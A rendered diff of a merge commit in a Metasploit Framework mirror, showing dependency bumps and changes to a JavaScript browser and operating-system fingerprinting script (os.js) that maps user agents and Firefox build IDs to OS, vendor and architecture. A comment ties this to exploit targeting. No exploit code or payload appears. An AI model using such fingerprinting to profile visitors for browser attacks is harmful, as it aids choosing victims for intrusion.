infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into staging/rails-4.0 

Conflicts:
	Gemfile
	Gemfile.lock
	metasploit-framework.gemspec
bug/bundler_fix
Matt Buck 2014-10-14 15:20:15 -05:00
parent 90bffe3cbc fdd79e64c3
commit 25d1caabb5
No known key found for this signature in database
GPG Key ID: 42134E0C9C4E94BB
148 changed files with 3799 additions and 922 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Gemfile
View File

@ -43,7 +43,7 @@ group :development, :test do
gem 'rspec', '>= 2.12', '< 3.0.0'
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
# environment is development
gem 'rspec-rails' , '>= 2.12', '< 3.0.0'
gem 'rspec-rails' , '>= 2.12', '< 3.0.0'
end
group :pcap do

5
Gemfile.lock
View File

@ -61,6 +61,7 @@ PATH
nokogiri
packetfu (= 1.1.9)
railties
recog (~> 1.0)
robots
rubyzip (~> 1.1)
sqlite3
@ -137,7 +138,7 @@ GEM
multi_json (~> 1.3)
hike (1.2.3)
i18n (0.6.11)
jsobfu (0.2.0)
jsobfu (0.2.1)
rkelly-remix (= 0.0.6)
json (1.8.1)
mail (2.6.1)
@ -184,6 +185,8 @@ GEM
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (10.3.2)
recog (1.0.0)
nokogiri
redcarpet (3.1.2)
rkelly-remix (0.0.6)
robots (0.10.1)

552
data/js/detect/os.js
View File

@ -1,19 +1,21 @@
// Case matters, see lib/msf/core/constants.rb
// All of these should match up with constants in ::Msf::HttpClients
var clients_opera = "Opera";
var clients_ie = "MSIE";
var clients_ff = "Firefox";
var clients_chrome= "Chrome";
var clients_safari= "Safari";
var clients_opera = "Opera";
var clients_ie = "MSIE";
var clients_ff = "Firefox";
var clients_chrome = "Chrome";
var clients_safari = "Safari";
// All of these should match up with constants in ::Msf::OperatingSystems
var oses_linux = "Linux";
var oses_windows = "Microsoft Windows";
var oses_mac_osx = "Mac OS X";
var oses_freebsd = "FreeBSD";
var oses_netbsd = "NetBSD";
var oses_openbsd = "OpenBSD";
var oses_linux = "Linux";
var oses_android = "Android";
var oses_windows = "Windows";
var oses_mac_osx = "Mac OS X";
var oses_apple_ios = "iOS";
var oses_freebsd = "FreeBSD";
var oses_netbsd = "NetBSD";
var oses_openbsd = "OpenBSD";
// All of these should match up with the ARCH_* constants
var arch_armle = "armle";
@ -33,6 +35,8 @@ var os_detect = {};
os_detect.getVersion = function(){
//Default values:
var os_name;
var os_vendor;
var os_device;
var os_flavor;
var os_sp;
var os_lang;
@ -120,11 +124,10 @@ os_detect.getVersion = function(){
// Android 2.3.6, opera mini 7.1
// Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10
if (navigator.userAgent.indexOf("Android")) {
os_name = oses_linux;
os_flavor = "Android";
os_name = oses_android;
} else if (navigator.userAgent.indexOf("iPhone")) {
os_name = oses_mac_osx;
os_flavor = "iPhone";
os_name = oses_apple_ios;
os_device = "iPhone";
}
break;
// A few are ambiguous, record them here
@ -162,28 +165,28 @@ os_detect.getVersion = function(){
// "Version" in the UA, see example above. Grab the webkit version
// instead. =/
if (platform.match(/ipod/)) {
os_name = oses_mac_osx;
os_flavor = "iPod";
os_name = oses_apple_ios;
os_device = "iPod";
arch = arch_armle;
search = "AppleWebKit";
} else if (platform.match(/ipad/)) {
os_name = oses_mac_osx;
os_flavor = "iPad";
os_name = oses_apple_ios;
os_device = "iPad";
arch = arch_armle;
search = "AppleWebKit";
} else if (platform.match(/iphone/)) {
os_name = oses_mac_osx;
os_flavor = "iPhone";
os_name = oses_apple_ios;
os_device = "iPhone";
arch = arch_armle;
} else if (platform.match(/macintel/)) {
os_name = oses_mac_osx;
arch = arch_x86;
} else if (platform.match(/linux/)) {
os_name = oses_linux;
if (platform.match(/x86_64/)) {
arch = arch_x86_64;
} else if (platform.match(/arm/)) {
// Android and maemo
arch = arch_armle;
} else if (platform.match(/x86/)) {
arch = arch_x86;
@ -191,9 +194,9 @@ os_detect.getVersion = function(){
arch = arch_mipsle;
}
// Android overrides Linux
if (navigator.userAgent.match(/android/i)) {
os_flavor = 'Android';
os_name = oses_android;
}
} else if (platform.match(/windows/)) {
os_name = oses_windows;
@ -263,7 +266,7 @@ os_detect.getVersion = function(){
ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0';
} else if ('HTMLSourceElement' in window &&
} else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) {
ua_version = '15.0';
@ -318,13 +321,17 @@ os_detect.getVersion = function(){
}
if (version.match(/Windows/)) {
os_name = oses_windows;
// Technically these will mismatch server OS editions, but those are
// rarely used as client systems and typically have the same exploit
// characteristics as the associated client.
switch(version) {
case "Windows NT 5.0": os_flavor = "2000"; break;
case "Windows NT 5.1": os_flavor = "XP"; break;
case "Windows NT 5.2": os_flavor = "2003"; break;
case "Windows NT 6.0": os_flavor = "Vista"; break;
case "Windows NT 6.1": os_flavor = "7"; break;
case "Windows NT 6.2": os_flavor = "8"; break;
case "Windows NT 5.0": os_name = "Windows 2000"; break;
case "Windows NT 5.1": os_name = "Windows XP"; break;
case "Windows NT 5.2": os_name = "Windows 2003"; break;
case "Windows NT 6.0": os_name = "Windows Vista"; break;
case "Windows NT 6.1": os_name = "Windows 7"; break;
case "Windows NT 6.2": os_name = "Windows 8"; break;
case "Windows NT 6.3": os_name = "Windows 8.1"; break;
}
}
if (version.match(/Linux/)) {
@ -343,17 +350,17 @@ os_detect.getVersion = function(){
var buildid = navigator.buildID;
switch(buildid) {
case "2008041514": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2008041515": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "2008052312": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2008041514": ua_version = "3.0.0.b5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2008041515": ua_version = "3.0.0.b5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "2008052312": ua_version = "3.0.0"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2008052906": ua_version = "3.0.0"; os_name = oses_windows; break;
case "2008052909": ua_version = "3.0.0.rc1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2008052909": ua_version = "3.0.0.rc1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2008052912": ua_version = "3.0.0"; os_name = oses_linux; break;
case "2008060309": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "2008060309": ua_version = "3.0.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "2008070205": ua_version = "2.0.0.16"; os_name = oses_windows; break;
case "2008070206": ua_version = "3.0.1"; os_name = oses_linux; break;
case "2008070208": ua_version = "3.0.1"; os_name = oses_windows; break;
case "2008071222": ua_version = "3.0.1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2008071222": ua_version = "3.0.1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2008072820":
switch (navigator.productSub) {
case "2008072820": ua_version = "3.0.1"; os_name = oses_linux; break;
@ -362,10 +369,10 @@ os_detect.getVersion = function(){
case "2008082909": ua_version = "2.0.0.17"; os_name = oses_windows; break;
case "2008091618": ua_version = "3.0.2"; os_name = oses_linux; break;
case "2008091620": ua_version = "3.0.2"; os_name = oses_windows; break;
case "2008092313": ua_version = "3.0.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2008092313": ua_version = "3.0.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2008092416": ua_version = "3.0.3"; os_name = oses_linux; break;
case "2008092417": ua_version = "3.0.3"; os_name = oses_windows; break;
case "2008092510": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2008092510": ua_version = "3.0.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2008101315":
switch (navigator.productSub) {
case "2008101315": ua_version = "3.0.3"; os_name = oses_linux; break;
@ -373,63 +380,63 @@ os_detect.getVersion = function(){
} break;
case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break;
case "2008102920": ua_version = "3.0.4"; break;
case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny)
case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny)
case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break;
case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break;
case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break;
case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron)
case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron)
case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break;
case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break;
case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break;
case "2009012615": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009012616": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009012615": ua_version = "3.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2009012616": ua_version = "3.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2009021906": ua_version = "3.0.7"; os_name = oses_linux; break;
case "2009021910": ua_version = "3.0.7"; os_name = oses_windows; break;
case "2009030422": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009030422": ua_version = "3.0.8"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2009032608": ua_version = "3.0.8"; os_name = oses_linux; break;
case "2009032609": ua_version = "3.0.8"; os_name = oses_windows; break;
case "2009032711": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009032711": ua_version = "3.0.9"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2009033100":
switch (navigator.productSub) {
case "2009033100": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "2009042113": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009033100": ua_version = "3.0.8"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "2009042113": ua_version = "3.0.9"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
} break;
case "2009040820": ua_version = "3.0.9"; os_name = oses_linux; break;
case "2009040821": ua_version = "3.0.9"; os_name = oses_windows; break;
case "2009042113": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009042114": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "2009042113": ua_version = "3.0.10"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2009042114": ua_version = "3.0.10"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "2009042315": ua_version = "3.0.10"; os_name = oses_linux; break;
case "2009042316": ua_version = "3.0.10"; os_name = oses_windows; break;
case "20090427153806": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20090427153807": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20090427153806": ua_version = "3.5.0.b4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20090427153807": ua_version = "3.5.0.b4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "2009060214": ua_version = "3.0.11"; os_name = oses_linux; break;
case "2009060215": ua_version = "3.0.11"; os_name = oses_windows; break;
case "2009060308":
switch (navigator.productSub) {
case "2009060308": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009060308": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
} break;
case "2009060309":
switch (navigator.productSub) {
case "2009060309": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "2009060309": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
} break;
case "2009060310": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "BackTrack"; break;
case "2009062005": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "PCLunixOS"; break;
case "2009060310": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "BackTrack"; break;
case "2009062005": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "PCLunixOS"; break;
case "20090624012136": ua_version = "3.5.0"; os_name = oses_mac_osx; break;
case "20090624012820": ua_version = "3.5.0"; os_name = oses_linux; break;
case "20090701234143": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20090702060527": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20090701234143": ua_version = "3.5.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20090702060527": ua_version = "3.5.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "2009070610": ua_version = "3.0.12"; os_name = oses_linux; break;
case "2009070611": ua_version = "3.0.12"; os_name = oses_windows; break;
case "2009070811": ua_version = "3.0.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "2009070811": ua_version = "3.0.13"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "20090715083437": ua_version = "3.5.1"; os_name = oses_mac_osx; break;
case "20090715083816": ua_version = "3.5.1"; os_name = oses_linux; break;
case "20090715094852": ua_version = "3.5.1"; os_name = oses_windows; break;
case "2009072202": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Oracle"; break;
case "2009072711": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "CentOS"; break;
case "2009072202": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "Oracle"; break;
case "2009072711": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "CentOS"; break;
case "20090729211433": ua_version = "3.5.2"; os_name = oses_mac_osx; break;
case "20090729211829": ua_version = "3.5.2"; os_name = oses_linux; break;
case "20090729225027": ua_version = "3.5.2"; os_name = oses_windows; break;
@ -439,34 +446,34 @@ os_detect.getVersion = function(){
case "20090824085743": ua_version = "3.5.3"; os_name = oses_linux; break;
case "20090824101458": ua_version = "3.5.3"; os_name = oses_windows; break;
case "2009082707": ua_version = "3.0.14"; break;
case "2009090216": ua_version = "3.0.14"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20090914014745": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
case "20090915065903": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
case "20090915070141": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break;
case "20091007090112": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20091007095328": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "2009090216": ua_version = "3.0.14"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20090914014745": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
case "20090915065903": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break;
case "20090915070141": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86; break;
case "20091007090112": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20091007095328": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "2009101600":
switch (navigator.productSub) {
case "2009101600": ua_version = "3.0.15"; break; // Can be either Mac or Linux
case "20091016": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "SUSE"; arch = arch_x86; break;
case "20091016": ua_version = "3.5.4"; os_name = oses_linux; os_vendor = "SUSE"; arch = arch_x86; break;
} break;
case "2009101601": ua_version = "3.0.15"; os_name = oses_windows; break;
case "20091016081620": ua_version = "3.5.4"; os_name = oses_mac_osx; break;
case "20091016081727": ua_version = "3.5.4"; os_name = oses_linux; break;
case "20091016092926": ua_version = "3.5.4"; os_name = oses_windows; break;
case "20091020122601": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "20091020122601": ua_version = "3.5.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "2009102814":
switch (navigator.productSub) {
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "2009121602": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Mint"; break;
case "2010021501": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86; break;
case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "2009121602": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_vendor = "Mint"; break;
case "2010021501": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_vendor = "Mint"; arch = arch_x86; break;
case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_vendor = "Mint"; arch = arch_x86_64; break;
} break;
case "2009102815":
switch (navigator.productSub) {
case "2009102815": ua_version = "3.0.15"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "2009102815": ua_version = "3.0.15"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
} break;
case "20091029152254": ua_version = "3.6.0.b1"; os_name = oses_linux; break;
case "20091029171059": ua_version = "3.6.0.b1"; os_name = oses_windows; break;
@ -474,23 +481,23 @@ os_detect.getVersion = function(){
case "20091102141836": ua_version = "3.5.5"; os_name = oses_linux; break;
case "20091102152451": ua_version = "3.5.5"; os_name = oses_windows; break;
case "2009110421": ua_version = "3.0.15"; os_name = oses_freebsd; arch = arch_x86; break;
case "20091106091959": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
case "20091106140514": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20091106145609": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20091106091959": ua_version = "3.5.5"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
case "20091106140514": ua_version = "3.5.5"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20091106145609": ua_version = "3.5.5"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "20091108163911": ua_version = "3.6.0.b2"; os_name = oses_linux; break;
case "20091108181924": ua_version = "3.6.0.b2"; os_name = oses_windows; break;
case "20091109125225":
switch (navigator.productSub) {
case "20091109": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20091109": ua_version = "3.5.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
} break;
case "20091109134913": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20091109134913": ua_version = "3.5.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20091115172547": ua_version = "3.6.0.b3"; os_name = oses_linux; break;
case "20091115182845": ua_version = "3.6.0.b3"; os_name = oses_windows; break;
case "20091124201530": ua_version = "3.6.0.b4"; os_name = oses_mac_osx; break;
case "20091124201751": ua_version = "3.6.0.b4"; os_name = oses_linux; break;
case "20091124213835": ua_version = "3.6.0.b4"; os_name = oses_windows; break;
case "2009120100": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "2009120100": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "20091201203240": ua_version = "3.5.6"; os_name = oses_mac_osx; break;
case "20091201204959": ua_version = "3.5.6"; os_name = oses_linux; break;
case "20091201220228": ua_version = "3.5.6"; os_name = oses_windows; break;
@ -499,74 +506,74 @@ os_detect.getVersion = function(){
case "20091204132459": ua_version = "3.6.0.b5"; os_name = oses_linux; break;
case "20091204132509": ua_version = "3.6.0.b5"; os_name = oses_mac_osx; break;
case "20091204143806": ua_version = "3.6.0.b5"; os_name = oses_windows; break;
case "20091215230859": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
case "20091215230946": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20091215231400": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20091215230859": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
case "20091215230946": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20091215231400": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20091215231754":
switch (navigator.productSub) {
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100106": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100106": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
} break;
case "2009121601":
switch (navigator.productSub) {
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // Could also be Mint x86-64
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // Could also be Mint x86-64
} break;
case "2009121602": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "20091216104148": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Mandriva"; break;
case "20091216132458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "20091216132537": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
case "2009121602": ua_version = "3.0.17"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "20091216104148": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Mandriva"; break;
case "20091216132458": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "20091216132537": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86; break;
case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break;
case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break;
case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break;
case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break;
case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break;
case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break;
case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "SUSE"; break;
case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "PCLunixOS"; arch = arch_x86; break;
case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break;
case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break;
case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break;
case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
case "20100110112429": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Mandriva"; break;
case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
case "20100110112429": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Mandriva"; break;
